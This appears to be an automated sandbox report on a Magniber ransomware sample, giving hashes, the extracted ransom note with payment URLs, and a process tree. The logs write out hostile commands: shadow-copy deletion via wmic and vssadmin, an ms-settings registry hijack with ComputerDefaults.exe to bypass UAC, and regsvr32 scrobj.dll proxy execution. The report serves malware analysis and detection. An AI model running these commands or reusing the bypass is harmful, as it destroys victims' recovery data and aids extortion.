magniber | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367

Resubmissions

06-11-2021 17:35

211106-v6ceqsehb2 10

06-11-2021 17:33

211106-v49bpacbhn 10

Analysis

max time kernel
27s
max time network
23s
platform
windows10_x64
resource
win10-en-20211104
submitted
06-11-2021 17:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Size

22KB
MD5

7906dc475a8ae55ffb5af7fd3ac8f10a
SHA1

e7304e2436dc0eddddba229f1ec7145055030151
SHA256

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
SHA512

c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://823ce6a0825852e08eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://823ce6a0825852e08eltalkfzj.jobsbig.cam/eltalkfzj http://823ce6a0825852e08eltalkfzj.boxgas.icu/eltalkfzj http://823ce6a0825852e08eltalkfzj.sixsees.club/eltalkfzj http://823ce6a0825852e08eltalkfzj.nowuser.casa/eltalkfzj Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://823ce6a0825852e08eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj

http://823ce6a0825852e08eltalkfzj.jobsbig.cam/eltalkfzj

http://823ce6a0825852e08eltalkfzj.boxgas.icu/eltalkfzj

http://823ce6a0825852e08eltalkfzj.sixsees.club/eltalkfzj

http://823ce6a0825852e08eltalkfzj.nowuser.casa/eltalkfzj

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 14 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2092	2144	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4596	2144	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4924	2144	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	976	2144	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2968	2144	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3108	2144	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4820	2144	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2152	2144	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3668	2144	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3776	2144	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4244	2144	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4208	2144	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4428	2144	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2616	2144	cmd.exe	89

Modifies extensions of user files 4 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

sihost.exe

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\RepairConnect.crw => C:\Users\Admin\Pictures\RepairConnect.crw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\ResolveMeasure.raw => C:\Users\Admin\Pictures\ResolveMeasure.raw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\InvokeSave.png => C:\Users\Admin\Pictures\InvokeSave.png.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\MountDebug.png => C:\Users\Admin\Pictures\MountDebug.png.eltalkfzj	sihost.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

description	pid	Process	procid_target
PID 3984 set thread context of 2408	3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	55
PID 3984 set thread context of 2424	3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	54
PID 3984 set thread context of 2704	3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	47
PID 3984 set thread context of 2060	3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	34
PID 3984 set thread context of 3460	3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	44
PID 3984 set thread context of 3796	3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	42

Program crash 1 IoCs

Processes:

WerFault.exe

pid	pid_target	Process	procid_target
1776	3796	WerFault.exe	42

Modifies registry class 29 IoCs

Processes:

Explorer.EXEsvchost.exesihost.exetaskhostw.exe1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exeRuntimeBroker.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell	sihost.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

Processes:

notepad.exe

pid	Process
4492	notepad.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exeWerFault.exe

pid	Process
3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid	Process
2060	Explorer.EXE

Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

pid	Process
3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WerFault.exeExplorer.EXEComputerDefaults.exeWMIC.exe

description	pid	Process
Token: SeDebugPrivilege	1776	WerFault.exe
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	520	ComputerDefaults.exe
Token: SeSecurityPrivilege	520	ComputerDefaults.exe
Token: SeTakeOwnershipPrivilege	520	ComputerDefaults.exe
Token: SeLoadDriverPrivilege	520	ComputerDefaults.exe
Token: SeSystemProfilePrivilege	520	ComputerDefaults.exe
Token: SeSystemtimePrivilege	520	ComputerDefaults.exe
Token: SeProfSingleProcessPrivilege	520	ComputerDefaults.exe
Token: SeIncBasePriorityPrivilege	520	ComputerDefaults.exe
Token: SeCreatePagefilePrivilege	520	ComputerDefaults.exe
Token: SeBackupPrivilege	520	ComputerDefaults.exe
Token: SeRestorePrivilege	520	ComputerDefaults.exe
Token: SeShutdownPrivilege	520	ComputerDefaults.exe
Token: SeDebugPrivilege	520	ComputerDefaults.exe
Token: SeSystemEnvironmentPrivilege	520	ComputerDefaults.exe
Token: SeRemoteShutdownPrivilege	520	ComputerDefaults.exe
Token: SeUndockPrivilege	520	ComputerDefaults.exe
Token: SeManageVolumePrivilege	520	ComputerDefaults.exe
Token: 33	520	ComputerDefaults.exe
Token: 34	520	ComputerDefaults.exe
Token: 35	520	ComputerDefaults.exe
Token: 36	520	ComputerDefaults.exe
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1044	WMIC.exe
Token: SeSecurityPrivilege	1044	WMIC.exe
Token: SeTakeOwnershipPrivilege	1044	WMIC.exe
Token: SeLoadDriverPrivilege	1044	WMIC.exe
Token: SeSystemProfilePrivilege	1044	WMIC.exe
Token: SeSystemtimePrivilege	1044	WMIC.exe
Token: SeProfSingleProcessPrivilege	1044	WMIC.exe
Token: SeIncBasePriorityPrivilege	1044	WMIC.exe
Token: SeCreatePagefilePrivilege	1044	WMIC.exe
Token: SeBackupPrivilege	1044	WMIC.exe
Token: SeRestorePrivilege	1044	WMIC.exe
Token: SeShutdownPrivilege	1044	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

sihost.execmd.exesvchost.execmd.exetaskhostw.exeExplorer.EXEcmd.execmd.exeRuntimeBroker.execmd.exe1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 2408 wrote to memory of 4492	2408	sihost.exe	71
PID 2408 wrote to memory of 4492	2408	sihost.exe	71
PID 2408 wrote to memory of 3128	2408	sihost.exe	73
PID 2408 wrote to memory of 3128	2408	sihost.exe	73
PID 2408 wrote to memory of 3696	2408	sihost.exe	74
PID 2408 wrote to memory of 3696	2408	sihost.exe	74
PID 2408 wrote to memory of 4056	2408	sihost.exe	76
PID 2408 wrote to memory of 4056	2408	sihost.exe	76
PID 4056 wrote to memory of 520	4056	cmd.exe	156
PID 4056 wrote to memory of 520	4056	cmd.exe	156
PID 2424 wrote to memory of 596	2424	svchost.exe	80
PID 2424 wrote to memory of 596	2424	svchost.exe	80
PID 2424 wrote to memory of 648	2424	svchost.exe	83
PID 2424 wrote to memory of 648	2424	svchost.exe	83
PID 3696 wrote to memory of 1044	3696	cmd.exe	84
PID 3696 wrote to memory of 1044	3696	cmd.exe	84
PID 2704 wrote to memory of 1328	2704	taskhostw.exe	85
PID 2704 wrote to memory of 1328	2704	taskhostw.exe	85
PID 2704 wrote to memory of 1552	2704	taskhostw.exe	87
PID 2704 wrote to memory of 1552	2704	taskhostw.exe	87
PID 2060 wrote to memory of 2396	2060	Explorer.EXE	90
PID 2060 wrote to memory of 2396	2060	Explorer.EXE	90
PID 2060 wrote to memory of 2612	2060	Explorer.EXE	94
PID 2060 wrote to memory of 2612	2060	Explorer.EXE	94
PID 596 wrote to memory of 2632	596	cmd.exe	91
PID 596 wrote to memory of 2632	596	cmd.exe	91
PID 648 wrote to memory of 2096	648	cmd.exe	102
PID 648 wrote to memory of 2096	648	cmd.exe	102
PID 3460 wrote to memory of 4600	3460	RuntimeBroker.exe	97
PID 3460 wrote to memory of 4600	3460	RuntimeBroker.exe	97
PID 3460 wrote to memory of 4876	3460	RuntimeBroker.exe	98
PID 3460 wrote to memory of 4876	3460	RuntimeBroker.exe	98
PID 1552 wrote to memory of 2276	1552	cmd.exe	104
PID 1552 wrote to memory of 2276	1552	cmd.exe	104
PID 3984 wrote to memory of 4916	3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	105
PID 3984 wrote to memory of 4916	3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	105
PID 3984 wrote to memory of 4908	3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	107
PID 3984 wrote to memory of 4908	3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	107
PID 1328 wrote to memory of 4320	1328	cmd.exe	111
PID 1328 wrote to memory of 4320	1328	cmd.exe	111
PID 2612 wrote to memory of 4300	2612	cmd.exe	112
PID 2612 wrote to memory of 4300	2612	cmd.exe	112
PID 3984 wrote to memory of 2828	3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	113
PID 3984 wrote to memory of 2828	3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	113
PID 3984 wrote to memory of 4128	3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	116
PID 3984 wrote to memory of 4128	3984	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	116
PID 2396 wrote to memory of 1212	2396	cmd.exe	117
PID 2396 wrote to memory of 1212	2396	cmd.exe	117
PID 4596 wrote to memory of 608	4596	cmd.exe	118
PID 4596 wrote to memory of 608	4596	cmd.exe	118
PID 2092 wrote to memory of 2840	2092	cmd.exe	119
PID 2092 wrote to memory of 2840	2092	cmd.exe	119
PID 4600 wrote to memory of 3180	4600	cmd.exe	120
PID 4600 wrote to memory of 3180	4600	cmd.exe	120
PID 4876 wrote to memory of 672	4876	cmd.exe	121
PID 4876 wrote to memory of 672	4876	cmd.exe	121
PID 4908 wrote to memory of 1344	4908	cmd.exe	122
PID 4908 wrote to memory of 1344	4908	cmd.exe	122
PID 2828 wrote to memory of 4672	2828	cmd.exe	123
PID 2828 wrote to memory of 4672	2828	cmd.exe	123
PID 4916 wrote to memory of 4124	4916	cmd.exe	125
PID 4916 wrote to memory of 4124	4916	cmd.exe	125
PID 4924 wrote to memory of 1448	4924	cmd.exe	124
PID 4924 wrote to memory of 1448	4924	cmd.exe	124

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2060
- C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
  "C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:3984
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4916
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:4124
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4908
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:1344
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2828
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:4672
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:4128
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:1668
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2396
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1212
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2612
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4300

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3796
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3796 -s 816
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1776

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3460
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4600
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3180
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4876
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:672

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2704
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1328
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4320
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1552
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2276

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2424
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:596
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2632
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:648
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2096

c:\windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2408
- \??\c:\windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:4492
- \??\c:\windows\system32\cmd.exe
  cmd /c "start http://823ce6a0825852e08eltalkfzj.jobsbig.cam/eltalkfzj^&1^&41345287^&71^&279^&2215063"
  2⤵
  PID:3128
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3696
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1044
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4056
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:520

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2092
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2840

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4596
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:608

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4924
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1448

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:976
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2204

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2968
